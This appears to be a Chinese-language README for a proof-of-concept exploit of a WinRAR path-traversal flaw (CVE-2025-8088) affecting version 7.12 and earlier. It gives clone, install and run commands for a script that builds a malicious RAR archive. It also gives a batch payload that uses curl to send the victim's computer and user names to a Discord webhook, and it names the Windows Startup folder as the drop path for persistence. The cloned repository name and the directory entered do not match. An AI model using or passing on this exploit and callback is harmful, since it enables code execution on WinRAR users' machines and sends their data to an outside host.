这是针对影响 7.12 及更低版本的 WinRAR 漏洞(CVE-2025-8088)的概念验证漏洞利用程序。该工具会创建一个恶意 RAR 压缩包,通过路径遍历将载荷嵌入备用数据流(ADS),可能导致任意代码执行。
# 克隆仓库
git clone https://github.com/techcorp/CVE-2025-8088-Exploit.git
cd best-CVE-2025-8088
# 安装依赖
pip install reportlab
# 运行漏洞利用程序
python CVE-2025-8088.py
编辑载荷以调用 Discord webhook:
# 替换脚本中的 PAYLOAD 变量:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""
将 YOUR_DISCORD_WEBHOOK_URL 替换为你实际的 webhook URL。
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\